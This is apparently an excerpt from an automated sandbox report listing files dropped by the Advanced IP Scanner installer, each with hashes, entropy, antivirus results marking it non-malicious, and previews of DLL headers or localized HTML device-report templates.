                                                                                                                      SHA-256:66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
                                                                                                                      SHA-512:1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24768
                                                                                                                      Entropy (8bit):6.784463110154403
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
                                                                                                                      MD5:32D7B95B1BCE23DB9FBD0578053BA87F
                                                                                                                      SHA1:7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
                                                                                                                      SHA-256:104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
                                                                                                                      SHA-512:7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):24768
                                                                                                                      Entropy (8bit):6.778007627268145
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
                                                                                                                      MD5:5E72659B38A2977984BBC23ED274F007
                                                                                                                      SHA1:EA622D608CC942BDB0FAD118C8060B60B2E985C9
                                                                                                                      SHA-256:44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
                                                                                                                      SHA-512:ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21184
                                                                                                                      Entropy (8bit):6.908629649625132
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
                                                                                                                      MD5:1FA7C2B81CDFD7ACE42A2A9A0781C946
                                                                                                                      SHA1:F5B7117D18A7335228829447E3ECCC7B806EF478
                                                                                                                      SHA-256:CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
                                                                                                                      SHA-512:339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):7.011995208399749
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
                                                                                                                      MD5:D6ABF5C056D80592F8E2439E195D61AC
                                                                                                                      SHA1:33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
                                                                                                                      SHA-256:8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
                                                                                                                      SHA-512:6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1800
                                                                                                                      Entropy (8bit):4.977566387382036
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:ngn27UxOUZyUejUC3UCJ8UZzoUH0OUvMU70qlUQCU2DYlO:gj7Lfdk3tM/4qyMVO
                                                                                                                      MD5:C342B5AAD7F710F39DD20641A1B3DF78
                                                                                                                      SHA1:7C3636884EE5A170230CAD8D3B5BB875E59C8DF8
                                                                                                                      SHA-256:A550CB4323FFBC96B8BED4E5A8F1A82E0EAAAF2987FF794DB55C7D48FB1CAFDC
                                                                                                                      SHA-512:CEC17544EB60EB296A742AF55D010EA5D31D3DC34E9DF809B58EFA074F195FA19032C6190FEBBE801E16BDE7A18C5463E35ADC334F34ABEC7B1DFD1E0632BCF6
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>.... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>...... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>........:</b></t
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1244
                                                                                                                      Entropy (8bit):5.128056579045673
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
                                                                                                                      MD5:1C7DAA7B7C3119E37B599739F3372A97
                                                                                                                      SHA1:D8E90B30F5D754C8B7623CF6FE3E5D298E620201
                                                                                                                      SHA-256:DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
                                                                                                                      SHA-512:ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">..
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1153
                                                                                                                      Entropy (8bit):4.877089271030429
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKoB2kV2B2uT2Bw2MKb2t52HcqQ2RCz282n0Kt1RhRGDbVzY1OzAkReEiWyv:lFosFsuS5XqiHJlL0Kt5RGDxReEhyv
                                                                                                                      MD5:1D0D5C190B173CB0BED10C8B2E0F9697
                                                                                                                      SHA1:83C10675F5A010668F4A278115BBC120F70EC99B
                                                                                                                      SHA-256:F45A1EFA7DE1EE6ABA559166B744E6398A5BF5233EE3954E0A4BD3EB0904CE3F
                                                                                                                      SHA-512:94E47E83159A43849DC269936D2B5E4866FB0C84DFDBB02664018CFCDBEDE06179F32324EE236910B4E2FEADC110F39EFD083A0F95B221E1D48A41A35E2C37FF
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robce:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ivatel:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Pozn.mky:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnosti</ce
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1151
                                                                                                                      Entropy (8bit):4.790118218856679
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
                                                                                                                      MD5:5AD712B9C416EE21623D620AB6019FB4
                                                                                                                      SHA1:51DF096A58D6DF2A7CE33E22511C671883F2228C
                                                                                                                      SHA-256:38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
                                                                                                                      SHA-512:608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1153
                                                                                                                      Entropy (8bit):4.788912446448768
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
                                                                                                                      MD5:FBA663967DF5DD4AB38D38DA1362598E
                                                                                                                      SHA1:9557B768C03EB179FDEBB5F74724985F51685203
                                                                                                                      SHA-256:466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
                                                                                                                      SHA-512:427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1256
                                                                                                                      Entropy (8bit):5.1672203710221565
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
                                                                                                                      MD5:38E55188530EE1FC3B88A22697957911
                                                                                                                      SHA1:BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
                                                                                                                      SHA-256:EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
                                                                                                                      SHA-512:F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1147
                                                                                                                      Entropy (8bit):4.784372507341765
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
                                                                                                                      MD5:04C416BEC9FE7DEC52E2F368353FF1F9
                                                                                                                      SHA1:DB86325EDF8EED3639A26ED279A00EBC9208ED1E
                                                                                                                      SHA-256:10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
                                                                                                                      SHA-512:4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1173
                                                                                                                      Entropy (8bit):4.837006163390497
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoSb9bqsuShXqRHRM9BHBl0Kt5RGDhC+6ReEhyv:Hpb9bqsRhXqRHwBhl0U2Dw+As
                                                                                                                      MD5:3DF24E832E07A361EE154A0635DF60F7
                                                                                                                      SHA1:B02EDAA0C6B997830669B6FF1A3C6FB43331CFD3
                                                                                                                      SHA-256:7A0B4383F55B6D2D52869CD50951FDE5ABE94208DE076161D12F7702537F37EA
                                                                                                                      SHA-512:C8E81AFCF8E26086E83E410F158C46336CDB039014FDB1686F5E039032E044B87EBFEF1E9E71CBA34FA6D0F24EFE914A4AE180A61CB80E619C18BBE1D6ACAD2C
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Estado:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usuario:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Fecha:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servicio t.cnico</center></b></td><td><b><center>M
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1150
                                                                                                                      Entropy (8bit):4.850275626289269
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lForPQsuSRBXqDH03Rrh0Kt5RGDVx3rgReEhyv:HyPQsRRBXqDHyRt0U2DVtras
                                                                                                                      MD5:6B21CA02EF7F5C3E6641DBB222A207DC
                                                                                                                      SHA1:215CE642734FDA5004F603E593FAA2EB70663500
                                                                                                                      SHA-256:3B0A1534FFEF9FB0B1BA169DDA53E26A940E0C644A47D8567E4E804D3DFADF24
                                                                                                                      SHA-512:A61FEAEBB6819C6B2CCC8120FB5E64CE71E8399C19221255FB7C3BCB9F557291A75CF965704003A7EA748753097B9E43D0548C1ACC9FE76DA490F70D55B85461
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Olek:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Ops.steem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tootja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kasutaja:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T..p:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Kuup.ev:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentaarid:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Teenus</center></b></td><td><b><center>.ksikasjad</cente
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1751
                                                                                                                      Entropy (8bit):4.952964955431726
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:ngn27UxzUZMUejUC3UCIUZzoUH0iUvoU7wpYlUQwU2DY4IO:gjmhfd0t07cqyOoIO
                                                                                                                      MD5:23760926BFC668193D027DB24E198051
                                                                                                                      SHA1:FF7AC19A7113F2DAA66B20C310A09752620E6455
                                                                                                                      SHA-256:2E4A9A21A7D3444008849936F5473F78CB4DB93E9EE0992F023767B682300635
                                                                                                                      SHA-512:F4B91BA666141C00C2282F2DCB3D5EB75F709A8E58D4DBF8992DAF17A1F163E019D1843A3A2441F392A46E4B9397666B5AD3CC76385BA3DF6897105250506E33
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>..... ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>......: ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1168
                                                                                                                      Entropy (8bit):4.8708624632073105
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFokVpsuS4XqW1H5l+Ah1j0Kt5RGDLDiReEhyv:H9VpsR4XqW1H5lBh1j0U2DLDos
                                                                                                                      MD5:6A9A7FB51DD16A4EDBEAF52A7567EA70
                                                                                                                      SHA1:27B2444894F6B432AD36CB14D79BAD1BA6529887
                                                                                                                      SHA-256:C4AD3344E412976BD9F7B8DDC8C60FDB94461201C814529CC5300FFDEB35BC08
                                                                                                                      SHA-512:E627B085002A98E4C899FB4B9C7F4A90531C2D25233E3AD1ED0C4BFA87D0DE7D8E38F07D3CD0130955670D9C5F50F1D2BA40BBDF355F0FD202B1CE278A734F54
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tila:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>K.ytt.j.rjestelm.:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Valmistaja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>K.ytt.j.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tyyppi:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>P.iv.m..r.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentit:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Palvelu</center></b></td><td><b><ce
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1163
                                                                                                                      Entropy (8bit):4.810701494539991
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFo3WsuSsXq9e/Hu0Bk0Kt5RGDzLcReEhyv:HeWsRsXqqHu4k0U2DzL+s
                                                                                                                      MD5:C6CEF752D7D9FD44C45C67AE637EC697
                                                                                                                      SHA1:AD7D24492C5B44BBD96C0705308548BE46B5A743
